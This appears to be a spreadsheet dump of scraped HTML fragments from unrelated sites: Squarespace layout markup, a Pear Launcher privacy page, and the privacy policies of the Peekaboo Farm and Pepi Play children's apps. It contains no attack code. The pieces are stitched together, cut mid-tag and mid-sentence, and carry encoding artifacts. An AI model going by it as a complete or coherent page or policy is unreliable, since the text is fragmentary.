  &lt;body id="collection-5cfc560a2b756600012b1adc" class="tweak-social-icons-style-solid tweak-social-icons-shape-square tweak-site-width-option-full-width tweak-icon-weight-light  tweak-site-ajax-loading-enable tweak-site-ajax-loading-bar-show ancillary-header-top-left-layout-horizontal ancillary-header-top-center-layout-horizontal ancillary-header-top-right-layout-horizontal ancillary-header-bottom-left-layout-horizontal ancillary-header-bottom-center-layout-horizontal ancillary-header-bottom-right-layout-horizontal ancillary-header-branding-position-hide ancillary-header-tagline-position-hide ancillary-header-primary-nav-position-top-left ancillary-header-secondary-nav-position-top-right ancillary-header-social-position-hide ancillary-header-search-position-hide ancillary-header-cart-position-bottom-right ancillary-header-account-position-hide tweak-header-primary-nav-hover-style-spotlight tweak-header-primary-nav-button-style-solid tweak-header-primary-nav-button-shape-square  tweak-header-secondary-nav-hover-style-active tweak-header-secondary-nav-button-style-solid tweak-header-secondary-nav-button-shape-square tweak-header-search-style-underlined tweak-header-search-placeholder-show tweak-header-cart-style-text tweak-header-account-style-icon   tweak-index-nav-style-none tweak-index-nav-position-right tweak-index-nav-text-show tweak-index-page-fullscreen-first-page-only  tweak-index-page-scroll-indicator-none tweak-index-page-scroll-indicator-icon-arrow tweak-index-page-scroll-indicator-icon-weight-hairline  tweak-index-gallery-layout-slideshow tweak-index-gallery-spacing-sides-show tweak-index-gallery-spacing-top-bottom-show tweak-index-gallery-fixed-height tweak-index-gallery-apply-bottom-spacing tweak-index-gallery-hover-style-plain tweak-index-gallery-controls-large-arrows tweak-index-gallery-controls-icon-weight-light tweak-index-gallery-indicators-dots tweak-index-gallery-autoplay-enable tweak-index-gallery-transition-slide tweak-index-gallery-content-position-middle-center tweak-index-gallery-content-text-alignment-center tweak-footer-show tweak-footer-layout-stacked tweak-footer-layout-columns-auto tweak-footer-stacked-alignment-center    ancillary-mobile-bar-branding-position-hide ancillary-mobile-bar-menu-icon-position-top-right tweak-mobile-bar-menu-icon-horizontal-dots ancillary-mobile-bar-search-icon-position-hide ancillary-mobile-bar-cart-position-top-right tweak-mobile-bar-cart-style-cart-alternate ancillary-mobile-bar-account-position-top-right tweak-mobile-bar-account-style-text tweak-mobile-overlay-slide-origin-left tweak-mobile-overlay-close-show  tweak-mobile-overlay-menu-primary-button-style-solid tweak-mobile-overlay-menu-primary-button-shape-square tweak-mobile-overlay-menu-secondary-inherit  tweak-mobile-overlay-menu-secondary-button-style-solid tweak-mobile-overlay-menu-secondary-button-shape-square tweak-quote-block-alignment-left  tweak-blog-meta-primary-author tweak-blog-meta-secondary-date tweak-blog-list-style-grid tweak-blog-list-separator-show tweak-blog-list-alignment-center tweak-blog-list-item-image-show tweak-blog-list-item-image-aspect-ratio-grid-43-four-three tweak-blog-list-item-image-aspect-ratio-stacked-11-square tweak-blog-list-item-title-show tweak-blog-list-item-excerpt-show tweak-blog-list-item-body-show tweak-blog-list-item-readmore-inline tweak-blog-list-item-meta-position-above-title tweak-blog-list-pagination-link-label-show tweak-blog-list-pagination-link-icon-show tweak-blog-list-pagination-link-icon-weight-light tweak-blog-item-alignment-center tweak-blog-item-meta-position-above-title tweak-blog-item-share-position-below-content  tweak-blog-item-pagination-link-label-show tweak-blog-item-pagination-link-title-show tweak-blog-item-pagination-link-meta-category tweak-blog-item-pagination-link-icon-weight-light   event-thumbnails event-thumbnail-size-32-standard event-date-label  event-list-show-cats event-list-date event-list-time event-list-address     event-excerpts  event-item-back-link    gallery-design-slideshow aspect-ratio-auto lightbox-style-dark gallery-navigation-bullets gallery-info-overlay-show-on-hover gallery-aspect-ratio-32-standard gallery-arrow-style-no-background gallery-transitions-fade gallery-show-arrows gallery-auto-crop   tweak-product-list-image-aspect-ratio-23-standard-vertical tweak-product-list-item-hover-behavior-show-alternate-image tweak-product-list-meta-position-under tweak-product-list-mobile-meta-position-under tweak-product-list-meta-alignment-under-left tweak-product-list-meta-alignment-overlay-bottom-center tweak-product-list-show-title tweak-product-list-show-price tweak-product-list-filter-display-left-side</t>
  </si>
  <si>
    <t xml:space="preserve">tweak-product-list-filter-alignment-left tweak-product-item-nav-show-breadcrumb-and-pagination tweak-product-item-nav-pagination-style-previousnext tweak-product-item-nav-breadcrumb-alignment-left tweak-product-item-nav-pagination-alignment-split tweak-product-item-gallery-position-left tweak-product-item-gallery-design-stacked tweak-product-item-gallery-aspect-ratio-23-standard-vertical tweak-product-item-gallery-thumbnail-alignment-left tweak-product-item-details-alignment-left tweak-product-item-details-show-title tweak-product-item-details-show-price tweak-product-item-details-show-excerpt tweak-product-item-details-excerpt-position-below-price tweak-product-item-details-show-share-buttons tweak-product-item-details-show-variants tweak-product-item-details-show-quantity tweak-product-item-details-options-style-square tweak-product-item-details-show-add-to-cart-button tweak-product-item-details-add-to-cart-button-style-outline tweak-product-item-details-add-to-cart-button-shape-square tweak-product-item-details-add-to-cart-button-padding-medium tweak-product-item-image-zoom-enabled tweak-product-item-image-zoom-behavior-click tweak-product-item-lightbox-enabled tweak-related-products-image-aspect-ratio-11-square tweak-related-products-meta-alignment-under-center tweak-product-badge-style-rectangle tweak-product-badge-position-top-right tweak-product-badge-inset-floating newsletter-style-custom hide-opentable-icons opentable-style-dark small-button-style-outline small-button-shape-square medium-button-style-solid medium-button-shape-square large-button-style-outline large-button-shape-square image-block-poster-text-alignment-left image-block-card-dynamic-font-sizing image-block-card-content-position-center image-block-card-text-alignment-left image-block-overlap-dynamic-font-sizing image-block-overlap-content-position-center image-block-overlap-text-alignment-left image-block-collage-dynamic-font-sizing image-block-collage-content-position-top image-block-collage-text-alignment-left image-block-stack-dynamic-font-sizing image-block-stack-text-alignment-left button-style-solid button-corner-style-pill tweak-product-quick-view-button-style-docked tweak-product-quick-view-button-position-top tweak-product-quick-view-lightbox-excerpt-display-truncate tweak-product-quick-view-lightbox-show-arrows tweak-product-quick-view-lightbox-show-close-button tweak-product-quick-view-lightbox-controls-weight-light tweak-share-buttons-style-icon-only tweak-share-buttons-icons-show    tweak-share-buttons-standard-background-color native-currency-code-usd collection-5cfc560a2b756600012b1adc collection-type-page collection-layout-default mobile-style-available sqs-has-custom-cart has-site-title has-tagline has-social enable-load-effects has-primary-nav has-secondary-nav has-footer-nav" data-controller="HashManager, SiteLoader, MobileClassname"&gt;
    &lt;div class="Loader"&gt;&lt;/div&gt;
    &lt;div class="Mobile" data-nc-base="mobile-bar" data-controller="AncillaryLayout"&gt;
  &lt;div class="Mobile-bar Mobile-bar--top" data-nc-group="top" data-controller="MobileOffset "&gt;
    &lt;div data-nc-container="top-left"&gt;
      &lt;a href="/" class="Mobile-bar-branding" data-nc-element="branding" data-content-field="site-title"&gt;
            Path of Giants
      &lt;/a&gt;
     &lt;/div&gt;
    &lt;div data-nc-container="top-center"&gt;&lt;/div&gt;
    &lt;div data-nc-container="top-right"&gt;&lt;/div&gt;
  &lt;/div&gt;
  &lt;div class="Mobile-bar Mobile-bar--bottom" data-nc-group="bottom" data-controller="MobileOffset"&gt;
    &lt;div data-nc-container="bottom-left"&gt;
      &lt;button class="Mobile-bar-menu" data-nc-element="menu-icon" data-controller-overlay="menu" data-controller="MobileOverlayToggle"&gt;
        &lt;svg class="Icon Icon--hamburger" viewBox="0 0 24 18"&gt;
          &lt;use xlink:href="/assets/ui-icons.svg#hamburger-icon--even" class="use--even"&gt;&lt;/use&gt;
          &lt;use xlink:href="/assets/ui-icons.svg#hamburger-icon--odd" class="use--odd"&gt;&lt;/use&gt;
        &lt;/svg&gt;
        &lt;svg class="Icon Icon--hotdog" viewBox="0 0 24 14"&gt;
          &lt;use xlink:href="/assets/ui-icons.svg#hotdog-icon--even" class="use--even"&gt;&lt;/use&gt;
          &lt;use xlink:href="/assets/ui-icons.svg#hotdog-icon--odd" class="use--odd"&gt;&lt;/use&gt;
        &lt;/svg&gt;
        &lt;svg class="Icon Icon--plus" viewBox="0 0 20 20"&gt;
          &lt;use xlink:href="/assets/ui-icons.svg#plus-icon--even" class="use--even"&gt;&lt;/use&gt;
          &lt;use xlink:href="/assets/ui-icons.svg#plus-icon--odd" class="use--odd"&gt;&lt;/use&gt;
        &lt;/svg&gt;
        &lt;svg class="Icon Icon--dots-horizontal" viewBox="0 0 25 7"&gt;
          &lt;use xlink:href="/assets/ui-icons.svg#dots-horizontal-icon--even" class="use--even"&gt;&lt;/use&gt;
          &lt;use xlink:href="/assets/ui-icons.svg#dots-horizontal-icon--odd" class="use--odd"&gt;&lt;/use&gt;
        &lt;/svg&gt;
        &lt;svg class="Icon Icon--dots-vertical" viewBox="0 0 7 25"&gt;
          &lt;use xlink:href="/assets/ui-icons.svg#dots-vertical-icon--even" class="use--even"&gt;&lt;/use&gt;
          &lt;use xlink:href="/assets/ui-icons.svg#dots-vertical-icon--odd" class="use--odd"&gt;&lt;/use&gt;
        &lt;/svg&gt;
        &lt;svg class="Icon Icon--squares-horizontal" viewBox="0 0 25 7"&gt;
          &lt;use xlink:href="/assets/ui-icons.svg#squares-horizontal-icon--even" class="use--even"&gt;&lt;/use&gt;
          &lt;use xlink:href="/assets/ui-icons.svg#squares-horizontal-icon--odd" class="use--odd"&gt;&lt;/use&gt;
       </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!doctype html&gt;
&lt;!--
  Material Design Lite
  Copyright 2015 Google Inc. All rights reserved.
  Licensed under the Apache License, Version 2.0 (the "License");
  you may not use this file except in compliance with the License.
  </t>
  </si>
  <si>
    <t>You may obtain a copy of the License at
      https://www.apache.org/licenses/LICENSE-2.0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--&gt;
&lt;html lang="en"&gt;
&lt;head&gt;
    &lt;meta charset="utf-8"&gt;
    &lt;meta http-equiv="X-UA-Compatible" content="IE=edge"&gt;
    &lt;meta name="description" content="A Home template that uses Material Design Lite. "&gt;
    &lt;meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0"&gt;
    &lt;title&gt;Pear Launcher&lt;/title&gt;
    &lt;link rel="stylesheet" href="https://fonts.googleapis.com/</t>
  </si>
  <si>
    <t>css?family=Roboto:regular,bold,italic,thin,light,bolditalic,black,medium&amp;amp;lang=en"&gt;
    &lt;link rel="stylesheet" href="https://code.getmdl.io/1.3.0/material.grey-pink.min.css" /&gt;
    &lt;link rel="stylesheet" href="styles.css" /&gt;
    &lt;link rel="stylesheet" href="https://fonts.googleapis.com/icon?family=Material+Icons"&gt;
&lt;/head&gt;
&lt;body&gt;
    &lt;div class="mdl-layout mdl-js-layout mdl-layout--fixed-header"&gt;
        &lt;header class="mdl-layout__header mdl-layout__header--waterfall Home-header"&gt;
            &lt;div class="mdl-layout__header-row Home-logo-row"&gt;
                &lt;span class="mdl-layout__title"&gt;
                    &lt;div class="Home-logo"&gt;&lt;/div&gt;
                    &lt;span class="mdl-layout__title"&gt;Pear Launcher&lt;/span&gt;
                &lt;/span&gt;
            &lt;/div&gt;
            &lt;div class="mdl-layout__header-row Home-navigation-row mdl-layout--large-screen-only"&gt;
                &lt;nav class="mdl-navigation mdl-typography--body-1-force-preferred-font"&gt;
                    &lt;a class="mdl-navigation__link is-active" href="index.html"&gt;Home&lt;/a&gt;
                    &lt;a class="mdl-navigation__link" href="about.html"&gt;About&lt;/a&gt;
                    &lt;a class="mdl-navigation__link" href="contact.html"&gt;Contact&lt;/a&gt;
                &lt;/nav&gt;
            &lt;/div&gt;
        &lt;/header&gt;
        &lt;div class="mdl-layout__drawer mdl-layout--small-screen-only"&gt;
            &lt;nav class="mdl-navigation mdl-typography--body-1-force-preferred-font"&gt;
                &lt;a class="mdl-navigation__link is-active" href="index.html"&gt;Home&lt;/a&gt;
                &lt;a class="mdl-navigation__link" href="about.html"&gt;About&lt;/a&gt;
                &lt;a class="mdl-navigation__link" href="contact.html"&gt;Contact&lt;/a&gt;
            &lt;/nav&gt;
        &lt;/div&gt;
        &lt;main class="mdl-layout__content"&gt;
            &lt;div class="mdl-grid Home-max-width"&gt;
                &lt;div class="mdl-cell mdl-cell--12-col mdl-card mdl-shadow--4dp"&gt;
                    &lt;div class="mdl-card__title"&gt;
                        &lt;h2 class="mdl-card__title-text"&gt;Privacy Policy&lt;/h2&gt;
                    &lt;/div&gt;
                    &lt;div class="mdl-grid Home-copy"&gt;
                        &lt;div class="mdl-cell mdl-cell--6-col mdl-card__supporting-text no-padding"&gt;
                            &lt;p&gt;Pear Launcher does not shares any data with anyone. Pear Launcher does not even have the internet access permission.&lt;/p&gt;
                        &lt;/div&gt;
                        &lt;div class="mdl-cell mdl-cell--6-col"&gt;
                            &lt;img class="article-image" src=" images/logo.png" border="0" alt=""&gt;
                        &lt;/div&gt;
                    &lt;/div&gt;
                &lt;/div&gt;
            &lt;/div&gt;
            &lt;footer class="mdl-mini-footer"&gt;
                &lt;div class="mdl-mini-footer__left-section"&gt;
                    &lt;div class="mdl-logo"&gt;Pear Launcher&lt;/div&gt;
                &lt;/div&gt;
                &lt;div class="mdl-mini-footer__right-section"&gt;
                    &lt;ul class="mdl-mini-footer__link-list"&gt;
                        &lt;li&gt;&lt;a href="contact.html"&gt;Help&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="privacy.html"&gt;Privacy &amp; Terms&lt;/a&gt;&lt;/li&gt;
                    &lt;/ul&gt;
                &lt;/div&gt;
            &lt;/footer&gt;
        &lt;/main&gt;
    &lt;/div&gt;
    &lt;script src="https://code.getmdl.io/1.3.0/material.min.js"&gt;&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE html&gt;&lt;html lang="en-US" itemscope itemtype="http://schema.org/WebPage"&gt;&lt;head&gt;&lt;meta charset="utf-8"&gt;&lt;script nonce="oK94xsA_yzL0er8JsL_BLQ"&gt;var DOCS_timing={}; DOCS_timing['sl']=new Date().getTime();&lt;/script&gt;&lt;script nonce="oK94xsA_yzL0er8JsL_BLQ"&gt;function _DumpException(e) {throw e;}&lt;/script&gt;&lt;script nonce="oK94xsA_yzL0er8JsL_BLQ"&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2UotxhHfkqpOe37pNgeOYHVjbhjfuD3GRXPMp-XuBEKU5p8RXPINX3kAdMb-8JoUXbB36e","je":1,"sstu":1681340321638246,"si":"CMnN-OS4pf4CFQTRawodeCcHRQ","gsc":null,"ei":[5703839,5704621,5706832,5706836,5707711,5735806,5737441,5737800,5738529,5740814,5743124,5746992,5747263,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50224286,50263472,50291080,50313182,50322323,50347752,50455861,50468091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href="https://ssl.gstatic.com/atari/images/public/favicon.ico"&gt;&lt;meta property="og:title" content="Privacy Policy for Peekaboo Farm Android App"&gt;&lt;meta property="og:type" content="website"&gt;&lt;meta property="og:url" content="https://sites.google.com/view/peekaboofarmprivacypolicy"&gt;&lt;meta property="og:description" content="
Privacy Policy
Lazaros Dinakis built the Peekaboo Farm app as a Free app. This SERVICE is provided by Lazaros Dinakis at no cost and is intended for use as is.
</t>
  </si>
  <si>
    <t>This page is used to inform visitors regarding my policies with the collection, use, and disclosure of Personal Information if anyone"&gt;&lt;meta itemprop="name" content="Privacy Policy for Peekaboo Farm Android App"&gt;&lt;meta itemprop="description" content="
Privacy Policy
Lazaros Dinakis built the Peekaboo Farm app as a Free app. This SERVICE is provided by Lazaros Dinakis at no cost and is intended for use as is.
 This page is used to inform visitors regarding my policies with the collection, use, and disclosure of Personal Information if anyone"&gt;&lt;meta itemprop="url" content="https://sites.google.com/view/peekaboofarmprivacypolicy"&gt;&lt;link href="https://fonts.googleapis.com/</t>
  </si>
  <si>
    <t>css?family=Lato%3A300%2C300italic%2C400%2C400italic%2C700%2C700italic&amp;display=swap" rel="stylesheet" nonce="7Pczw1C_uQ1t-cTlC9fvKw"&gt;&lt;link href="https://fonts.googleapis.com/ css?family=Google+Sans:400,500|Roboto:300,400,500,700|Source+Code+Pro:400,700&amp;display=swap" rel="stylesheet" nonce="7Pczw1C_uQ1t-cTlC9fvKw"&gt;&lt;link rel="stylesheet" href="https://www.gstatic.com/_/atari/_/ss/k=atari.vw.jffPnSbrV38.L.X.O/d=1/rs=AGEqA5liTY9eJ3KZzwxTWsMzfIyQn11GcQ" data-id="_cl" nonce="7Pczw1C_uQ1t-cTlC9fvKw"&gt;&lt;script nonce="oK94xsA_yzL0er8JsL_BLQ"&gt;&lt;/script&gt;&lt;title&gt;Privacy Policy for Peekaboo Farm Android App&lt;/title&gt;&lt;style jsname="ptDGoc" nonce="7Pczw1C_uQ1t-cTlC9fvKw"&gt;.M63kCb{background-color: rgba(255,255,255,1);}.OUGEr{color: rgba(33,33,33,1);}.duRjpb .OUGEr{color:</t>
  </si>
  <si>
    <t>767px){.TMjjoe{font-size: 9pt;}}&lt;/style&gt;&lt;script nonce="oK94xsA_yzL0er8JsL_BLQ"&gt;_at_config = [null,"AIzaSyChg3MFqzdi1P5J-YvEyakkSA1yU7HRcDI","897606708560-a63d8ia0t9dhtpdt4i3djab2m42see7o.apps.googleusercontent.com",null,null,null,null,null,null,null,null,null,null,null,"SITES_%s",null,null,null,null,null,null,null,null,null,["AHKXmL2UotxhHfkqpOe37pNgeOYHVjbhjfuD3GRXPMp-XuBEKU5p8RXPINX3kAdMb-8JoUXbB36e",1,"CMnN-OS4pf4CFQTRawodeCcHRQ",1681340321638246,[5703839,5704621,5706832,5706836,5707711,5735806,5737441,5737800,5738529,5740814,5743124,5746992,5747263,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50224286,50263472,50291080,50313182,50322323,50347752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0,null,"v2beta",null,null,null,null,null,null,4,"https://accounts.google.com/o/oauth2/iframe",null,null,null,null,null,null,"https://804823948-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https://sites.google.com/view/peekaboofarmprivacypolicy",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[1681340321651,"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{"enableAnalytics":true,"webPropertyId":"","showDebug":false,"hashedSiteId":"32b7d02600c7fa80a8d2fceb4e516d8e36f367237c87cbf24a01f2f6059390f0","normalizedPath":"view/peekaboofarmprivacypolicy/home","pageTitle":"Home"};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nonce="oK94xsA_yzL0er8JsL_BLQ"&gt;&lt;/script&gt;&lt;script nonce="oK94xsA_yzL0er8JsL_BLQ"&gt;(function(){/*
 Copyright The Closure Library Authors.
 SPDX-License-Identifier:</t>
  </si>
  <si>
    <t>Apache-2.0
*/
var a=(this||self)._jsa||{};a._cfc=void 0;a._aeh=void 0;}).call(this);
 &lt;/script&gt;&lt;script nonce="oK94xsA_yzL0er8JsL_BLQ"&gt;const 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data-sitename="peekaboofarmprivacypolicy" data-universe="1"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mouseup:lbsD7e; mouseenter:tfO1Yc; mouseleave:JywGue; focus:AHmuwe; blur:O22p3e; contextmenu:mg9Pef;touchstart:p6p2H; touchmove:FwuNnf; touchend:</t>
  </si>
  <si>
    <t>yfqBxc(preventMouseEvents=true|preventDefault=true); touchcancel:JMtRjd;" jsshadow jsname="GeGHKb" aria-label="Back to site" aria-disabled="false" tabindex="0" data-tooltip="Back to site" data-tooltip-vertical-offset="-12" data-tooltip-horizontal-offset="0"&gt;&lt;div class="VTBa7b MbhUzd" jsname="ksKsZd"&gt;&lt;/div&gt;&lt;span jsslot class="xjKiLb"&gt;&lt;span class="Ce1Y1c" style="top: -12px"&gt;&lt;svg class="V4YR2c" viewBox="0 0 24 24" focusable="false"&gt;&lt;path d="M0 0h24v24H0z" fill="none"/&gt;&lt;path d="M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.41L7.83 13H20v-2z"/&gt;&lt;/svg&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="E2UJ5" jsname="M6JdT"&gt;&lt;div class="rFrNMe b7AJhc zKHdkd" jscontroller="pxq3x" jsaction="clickonly:KjsqPd; focus:Jt1EX; blur:fpfTEe; input:Lg5SV" jsshadow jsname="OH0EC" aria-expanded="true"&gt;&lt;div class="aCsJod oJeWuf"&gt;&lt;div class="aXBtI I0VJ4d Wic03c"&gt;&lt;span jsslot class="A37UZe qgcB3c iHd5yb"&gt;&lt;div role="button" class="U26fgb mUbCce fKz7Od i3PoXe M9Bg4d" jscon</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE html&gt;
&lt;html lang="en-US"&gt;
    &lt;head&gt;
        &lt;meta charset="UTF-8" /&gt;
		&lt;title&gt;Pepi Play - Apps For Children &amp;raquo; privacy_policy&lt;/title&gt;
		&lt;link href="https://www.pepiplay.com/wp-content/themes/pepiplay/images/favicon.ico" rel="SHORTCUT ICON"&gt;
		&lt;meta name="viewport" content="width=device-width, initial-scale=0.75, maximum-scale=1.2, minimum-scale=0.75"&gt;
		&lt;meta name="description" content="Pepi Play is an independent studio that creates applications for children. "&gt;
		&lt;meta name="google-site-verification" content="Z244BGA3zpLtmf8KhmWBUnTsJ8MNf3SawFr5aoMHcVU" /&gt;
		&lt;link rel="pingback" href="https://www.pepiplay.com/xmlrpc.php" /&gt;
		&lt;link rel="stylesheet" type="text/css" media="all" href="https://www.pepiplay.com/wp-content/themes/pepiplay/style.css" /&gt;
        		&lt;script src="https://www.pepiplay.com/wp-content/themes/pepiplay/js/jquery-1.7.1.min.js"&gt;&lt;/script&gt;
		&lt;script src="https://www.pepiplay.com/wp-content/themes/pepiplay/js/general.js"&gt;&lt;/script&gt;
        &lt;meta name='robots' content='max-image-preview:large' /&gt;
&lt;script type="text/javascript"&gt;
</t>
  </si>
  <si>
    <t>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.pepiplay.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.2"}};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t>
  </si>
  <si>
    <t>important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
&lt;/style&gt;
	&lt;link rel='stylesheet' id='wp-block-library-css' href='https://www.pepiplay.com/wp-includes/css/dist/block-library/style.min.css?ver=6.2' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='classic-theme-styles-css' href='https://www.pepiplay.com/wp-includes/css/classic-themes.min.css?ver=6.2'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 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined:</t>
  </si>
  <si>
    <t>important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) ! important;}
.wp-block-navigation a:where(:not(.wp-element-button)){color: inherit;}
:where(.wp-block-columns.is-layout-flex){gap: 2em;}
.wp-block-pullquote{font-size: 1.5em;line-height: 1.6;}
&lt;/style&gt;
&lt;link rel='stylesheet' id='contact-form-7-css' href='https://www.pepiplay.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.5.1' type='text/css' media='all' /&gt;
&lt;link rel="https://api.w.org/" href="https://www.pepiplay.com/wp-json/" /&gt;&lt;link rel="alternate" type="application/json" href="https://www.pepiplay.com/wp-json/wp/v2/pages/254" /&gt;&lt;link</t>
  </si>
  <si>
    <t>rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.pepiplay.com/xmlrpc.php?rsd" /&gt;
&lt;link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.pepiplay.com/wp-includes/wlwmanifest.xml" /&gt;
&lt;meta name="generator" content="WordPress 6.2" /&gt;
&lt;link rel="canonical" href="https://www.pepiplay.com/privacy_policy/" /&gt;
&lt;link rel='shortlink' href='https://www.pepiplay.com/?p=254' /&gt;
&lt;link rel="alternate" type="application/json+oembed" href="https://www.pepiplay.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.pepiplay.com%2Fprivacy_policy%2F" /&gt;
&lt;link rel="alternate" type="text/xml+oembed" href="https://www.pepiplay.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.pepiplay.com%2Fprivacy_policy%2F&amp;#038;format=xml" /&gt;
&lt;!-- Analytics by WP Statistics v14.0.2 - https://wp-statistics.com/ --&gt;
    &lt;!-- MailerLite Universal --&gt;
&lt;script&gt;
(function(m,a,i,l,e,r){ m['MailerLiteObject']=e;function f(){
var c={ a:arguments,q:[]};var r=this.push(c);return "number"!=typeof r?r:f.bind(c.q);}
f.q=f.q||[];m[e]=m[e]||f.bind(f.q);m[e].q=m[e].q||f.q;r=a.createElement(i);
var _ =a.getElementsByTagName(i)[0];r.async=1;r.src=l+'?v'+(~~(new Date().getTime()/1000000));
_.parentNode.insertBefore(r,_);})(window, document, 'script', 'https://static.mailerlite.com/js/universal.js', 'ml');
var ml_account</t>
  </si>
  <si>
    <t>APPS MENU --&gt;
	&lt;div id="pageContent"&gt;
			&lt;article id="post-254" class="post-254 page type-page status-publish hentry"&gt;
			&lt;span style="font-size: 16pt;"&gt;_x005F_x000D_
&lt;p&gt;&lt;strong&gt;Privacy Policy&lt;/strong&gt;&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;&lt;strong&gt;Overview&lt;/strong&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;Here at Pepi Play we design apps primarily for children, but parents are encouraged to play together and moderate child’s experience. We take privacy seriously and aim to comply with all privacy regulations worldwide, like the Children’s Online Privacy Protection Act (COPPA).&amp;nbsp; This Privacy Policy describes the information collected by Pepi Play through mobile applications and website and how we use that information.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;&lt;strong&gt;What Information Do We Collect?&lt;/strong&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;We collect technical information based on his use, which includes:&amp;nbsp;_x005F_x000D_
&lt;ul&gt;_x005F_x000D_
 	&lt;li&gt;Technical information relating to his device, such as his mobile device’s brand, model, operating system version and country.&lt;/li&gt;_x005F_x000D_
 	&lt;li&gt;Non personal data about user game progress, which helps us improve our applications. This includes certain game elements and characters used by player, time spent during the game, crash reports and pages visited.&lt;/li&gt;_x005F_x000D_
 	&lt;li&gt;Some demographic information including device owners gender and age;&lt;/li&gt;_x005F_x000D_
&lt;/ul&gt;&lt;/p&gt;_x005F_x000D_
&lt;p&gt;&lt;strong&gt;Who Do We Share Your Child’s Information With?&lt;/strong&gt;&lt;/p&gt;_x005F_x000D_
_</t>
  </si>
  <si>
    <t>x000D_
 We acknowledge that children are a special, delicate and susceptible group, and therefore we try to minimize all exposure of children’s information to anyone. We only share specific information with our employees and with some third parties who provide us with a part of the services, including:_x005F_x000D_
&lt;ul&gt;_x005F_x000D_
 	&lt;li&gt;Google’s Firebase and Firebase Analytics for database and statistics.&amp;nbsp;&lt;/li&gt;_x005F_x000D_
 	&lt;li&gt;Mailchimp and MailerLite to collect and send emails about new apps to our subscribers.&lt;/li&gt;_x005F_x000D_
 	&lt;li&gt;Iron Source for displaying advertisements, which is not behavioral and do not target your child specifically.&lt;/li&gt;_x005F_x000D_
 	&lt;li&gt;Our Apps may display advertisements served by SuperAwesome Trading Limited (“SuperAwesome”), a provider of kid-safe advertising services that are designed specifically for the compliance requirements of younger audiences, including those aged under 13.</t>
  </si>
  <si>
    <t>SuperAwesome places contextual advertising on applications developed by Pepi Play without collecting any personally identifiable information, including persistent identifiers._x005F_x000D_
SuperAwesome is certified as COPPA-compliant by the kidSAFE Seal Program, an FTC-Approved COPPA Safe Harbor Program. Please go to www.kidsafeseal.com for more information._x005F_x000D_
 SuperAwesome is a valid licensee, and participating member, of the Entertainment Software Rating Board’s Privacy Certified Program (“ESRB Privacy Certified”).</t>
  </si>
  <si>
    <t xml:space="preserve">To protect your privacy, SuperAwesome has voluntarily undertaken this privacy initiative, and its services have been reviewed and certified by ESRB Privacy Certified to meet established online information collection, use and disclosure practices. As a licensee of this privacy program, SuperAwesome’s services are subject to frequent audits and other enforcement and accountability mechanisms administered independently by ESRB Privacy Certified._x005F_x000D_
SuperAwesome also provides advertising services in compliance with the General Data Protection Regulation (EU 1996/679). Adopting an approach of ‘privacy by design and by default’, SuperAwesome utilises proprietary technologies so that it neither collects, stores nor shares your personal data to provision advertisements or target advertising to you._x005F_x000D_
</t>
  </si>
  <si>
    <t>You may contact SuperAwesome directly at privacy@superawesome.com on + 44 203 668 6677, or by post: Privacy Team, SuperAwesome Trading Limited, 22 Long Acre, London WC2E 9LY, United Kingdom.&lt;/li&gt;_x005F_x000D_
 	&lt;li&gt;Our Apps may display advertisements served by InMobi.&amp;nbsp;InMobi is committed to respecting and protecting individuals&amp;#8217; privacy rights and complying with all applicable laws and regulations including the US Children&amp;#8217;s Online Privacy Protection Act (&amp;#8220;&lt;b&gt;COPPA&lt;/b&gt;&amp;#8220;) rules effective on July 1, 2013. InMobi adopts the policy of not knowingly collecting any personal information about children under the age of 13 in US. In response to the new COPPA rules effective on July 1, 2013 InMobi is continuing to ensure that we do not collect and use information from children&amp;#8217;s sites for behavioral advertising (often referred to as interest-based advertising).</t>
  </si>
  <si>
    <t>We will continue to only use any data in the manner that COPPA prescribes. We have identified all existing publisher sites and apps directed to children to ensure we are in full compliance with the new COPPA rules and from 30 June, 2013 ensure that new and existing publishers are required to notify InMobi of any new sites or app accounts that are directed at children to ensure we continue to comply with the COPPA rules. InMobi is also compliant with GDPR and the age gating provisions GDPR in EEA.</t>
  </si>
  <si>
    <t>Please contact&amp;nbsp;&lt;a href="https://aerserv.getoutreach.com/api/mailings/click/PMRHK4TMEI5CE3LBNFWHI3Z2OBZGS5TBMN4UA2LONVXWE2JOMNXW2IRMEJUWIIR2GUZTCOBWGYWCE33SM4RDUIRYMYZGGNRYGI4S2MBUMJQS2MJRMU3C2OJUGBQS2MBSMM4WCNRYG5RTGM3CEIWCE5TFOJZWS33OEI5CENBCFQRHG2LHEI5CE6JZFV5HOWC2MFGFGSK2NNCWCVDOGZ2TG2TCGBXWOWSPIREWYYSNNFVEEUTVIRZXGURSNM6SE7I=" target="_blank" rel="noopener noreferrer"&gt;privacy@inmobi.com&lt;/a&gt;&amp;nbsp;if you have any questions.&lt;/li&gt;_x005F_x000D_
&lt;/ul&gt;_x005F_x000D_
